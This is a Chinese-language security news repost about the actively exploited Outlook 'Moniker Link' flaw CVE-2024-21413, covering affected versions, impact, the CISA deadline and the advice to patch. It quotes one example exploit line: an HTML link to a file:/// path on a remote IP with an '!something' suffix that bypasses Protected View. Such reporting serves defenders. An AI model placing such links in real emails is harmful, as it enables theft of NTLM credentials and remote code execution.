CVE-2024-21413 (CVSS 9.8):严重 Outlook 漏洞正受到主动攻击,PoC 可用

admin 2025年2月9日00:40:22评论42 views字数 1088阅读3分37秒阅读模式

CVE-2024-21413 (CVSS 9.8):严重 Outlook 漏洞正受到主动攻击,PoC 可用

Microsoft Outlook 中一个严重漏洞(编号为 CVE-2024-21413)正在被广泛利用,对全球组织构成重大威胁。该漏洞的 CVSS 评分为 9.8(满分 10 分),攻击者只需打开恶意电子邮件即可远程执行任意代码。

该漏洞由 Check Point 安全研究员 Haifei Li 发现,影响多个版本的 Microsoft Office,包括 Office 2016、2019、LTSC 2021 和 Microsoft 365 Enterprise 应用程序。该漏洞存在于 Outlook 在处理包含恶意链接的电子邮件时输入验证不当。至关重要的是,它允许攻击者绕过受保护的视图(旨在以只读模式打开 Office 文件的安全功能),而是以完全编辑模式打开恶意文档。

该漏洞被 Check Point 称为“Moniker Link”,利用了 Outlook 处理 file:// 协议链接时的一个漏洞。通过在 URL 中的文件扩展名后添加感叹号和任意文本(例如)

<a href=”file:///\10.10.111.111testtest.rtf!something”>CLICK ME</a>

攻击者可以绕过 Outlook 的安全限制。这允许客户端访问远程资源而不会触发警告,从而为恶意负载打开大门。Check Point 确认了该漏洞在最新的 Windows 10/11 和 Microsoft 365(Office 2021)环境中的有效性,这表明其他 Office 版本可能也受到影响。他们认为这是 Windows/COM 生态系统中长期存在的问题,存在于核心 COM API 中。

成功利用该漏洞的影响非常严重,包括窃取 NTLM 凭据信息以及通过恶意制作的 Office 文档执行任意代码。这可能使攻击者能够完全控制受害者的计算机、窃取敏感数据、部署勒索软件或执行其他恶意活动。

美国网络安全和基础设施安全局 (CISA) 已发出警告,要求美国联邦机构在 2 月 27 日之前修补其系统,以防此漏洞被积极利用。鉴于漏洞的严重性和持续的攻击,尚未更新 Outlook 版本的组织面临巨大风险。

尽管微软最初否认CVE-2024-21413 在零日攻击中被利用,但最近的报告表明威胁行为者正在积极滥用该漏洞。GitHub 上已发布了一个概念验证 (PoC) 漏洞,这进一步增加了大规模攻击的风险。

Check Point 强烈建议所有 Outlook 用户尽快应用官方 Microsoft 补丁。此关键更新对于防范此被积极利用的漏洞并防止潜在的灾难性后果至关重要。不要等待 - 立即修补!

原文始发于微信公众号(Ots安全):CVE-2024-21413 (CVSS 9.8):严重 Outlook 漏洞正受到主动攻击,PoC 可用

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月9日00:40:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-21413 (CVSS 9.8):严重 Outlook 漏洞正受到主动攻击,PoC 可用https://cn-sec.com/archives/3716759.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息